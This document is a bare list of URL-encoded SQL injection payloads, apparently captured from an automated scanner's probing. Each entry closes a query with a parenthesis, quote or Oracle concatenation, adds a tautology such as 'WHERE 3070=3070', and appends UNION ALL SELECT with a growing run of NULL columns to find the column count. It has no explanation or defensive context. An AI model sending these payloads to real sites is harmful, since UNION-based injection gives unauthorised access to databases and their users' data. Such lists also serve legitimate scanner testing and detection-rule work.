1234.5%29%20WHERE%203070%3D3070%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%205123%3D5123%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%204096%3D4096%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%202741%3D2741%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%205825%3D5825%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%206791%3D6791%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%201699%3D1699%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%206934%3D6934%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%209868%3D9868%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203111%3D3111%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206176%3D6176%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206045%3D6045%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%204504%3D4504%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%207158%3D7158%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%202823%3D2823%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%206401%3D6401%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%205450%3D5450%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%203839%3D3839%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%204251%3D4251%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%206333%3D6333%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201915%3D1915%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%207988%3D7988%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%208921%3D8921%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%208926%3D8926%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202438%3D2438%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%203827%3D3827%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%208838%3D8838%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201709%3D1709%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201253%3D1253%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206661%3D6661%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%205027%3D5027%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%205507%3D5507%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201402%3D1402%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%204669%3D4669%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201622%3D1622%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%204620%3D4620%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206050%3D6050%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%205421%3D5421%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%209228%3D9228%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Awsg%27%20FROM%20DUAL%20WHERE%209242%3D9242%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27kWgu%27%20FROM%20DUAL%20WHERE%201433%3D1433%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27zfOG%27%20FROM%20DUAL%20WHERE%202005%3D2005%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ntrW%27%20FROM%20DUAL%20WHERE%207164%3D7164%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ljAy%27%20FROM%20DUAL%20WHERE%204398%3D4398%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27upsj%27%20FROM%20DUAL%20WHERE%204119%3D4119%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27VuHB%27%20FROM%20DUAL%20WHERE%209337%3D9337%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27GMrj%27%20FROM%20DUAL%20WHERE%205028%3D5028%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 